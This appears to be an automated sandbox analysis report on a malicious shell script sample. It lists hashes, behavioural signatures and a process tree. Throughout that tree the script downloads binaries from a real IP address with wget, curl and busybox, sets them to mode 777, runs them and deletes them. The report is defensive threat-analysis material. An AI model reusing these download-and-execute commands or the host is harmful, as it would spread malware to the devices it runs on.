Analysis
-
max time kernel
146s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:35
Static task
static1
Behavioral task
behavioral1
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
-
Size
10KB
-
MD5
3a1ff8e10160c3ffbe68101993bf1067
-
SHA1
cbe663779e29b21349683a8c313cd1cb1c5eecaf
-
SHA256
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63
-
SHA512
8513787e954b7a1209578497e6d91f13f54b1ab38ef937cb0f6d6cfd320fc1c4c4a7a8a4890ee1a8ad873d62e91cb2e5e82fa1f3673c62e6bb23d94110307586
-
SSDEEP
192:v7mG3aGTwUII9c4gCONyqRGZy5947TfmG3aGL4II9c845947T/CONyqy:vS4gCONyqRGZy5947Te45947T/CONyqy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 902 chmod 826 chmod 908 chmod 944 chmod 962 chmod 734 chmod 765 chmod 812 chmod 860 chmod 727 chmod 787 chmod 896 chmod 878 chmod 884 chmod 866 chmod 914 chmod 846 chmod 872 chmod 890 chmod 926 chmod 938 chmod 950 chmod 956 chmod 740 chmod 806 chmod 968 chmod 920 chmod 932 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM 728 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK 735 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO 741 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe 766 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c 788 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W 807 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 813 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr 827 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a 848 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC 861 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 867 phFMgsQArmVdg945D14ipduIUYswPNrcK1 /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh 873 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG 879 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP 885 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe 891 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c 897 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W 903 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 909 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO 915 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr 921 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a 927 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 933 phFMgsQArmVdg945D14ipduIUYswPNrcK1 /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh 939 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG 945 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP 951 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC 957 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM 963 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK 969 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 20 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 867 phFMgsQArmVdg945D14ipduIUYswPNrcK1 909 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 910 rm 933 phFMgsQArmVdg945D14ipduIUYswPNrcK1 934 rm 809 wget 863 wget 865 busybox 868 rm 929 wget 931 busybox 813 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 814 rm 864 curl 905 wget 930 curl 810 curl 811 busybox 906 curl 907 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu curl File opened for modification /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a curl File opened for modification /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh curl File opened for modification /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a curl File opened for modification /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG curl File opened for modification /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP curl File opened for modification /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe curl File opened for modification /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC curl File opened for modification /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c curl File opened for modification /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO curl File opened for modification /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO curl File opened for modification /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr curl File opened for modification /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 curl File opened for modification /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK curl File opened for modification /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh curl File opened for modification /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W curl File opened for modification /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c curl File opened for modification /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP curl File opened for modification /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe curl File opened for modification /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr curl File opened for modification /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK curl File opened for modification /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG curl File opened for modification /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 curl File opened for modification /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC curl File opened for modification /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM curl File opened for modification /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W curl File opened for modification /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu curl File opened for modification /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM curl
Processes
-
/tmp/a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh/tmp/a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh1⤵PID:696
-
/bin/rm/bin/rm bins.sh2⤵PID:702
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:704
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:723
-
-
/bin/chmodchmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Executes dropped EXE
PID:728
-
-
/bin/rmrm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:729
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:733
-
-
/bin/chmodchmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:736
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:739
-
-
/bin/chmodchmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:762
-
-
/bin/chmodchmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:770
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:783
-
-
/bin/chmodchmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:793
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:795
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:805
-
-
/bin/chmodchmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:809
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:811
-
-
/bin/chmodchmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:813
-
-
/bin/rmrm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:814
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:821
-
-
/bin/chmodchmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:845
-
-
/bin/chmodchmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:850
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:859
-
-
/bin/chmodchmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1./phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:867
-
-
/bin/rmrm phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:868
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:871
-
-
/bin/chmodchmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:877
-
-
/bin/chmodchmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:883
-
-
/bin/chmodchmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:889
-
-
/bin/chmodchmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:895
-
-
/bin/chmodchmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:901
-
-
/bin/chmodchmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:909
-
-
/bin/rmrm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:913
-
-
/bin/chmodchmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:919
-
-
/bin/chmodchmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Reads runtime system information
- Writes file to tmp directory
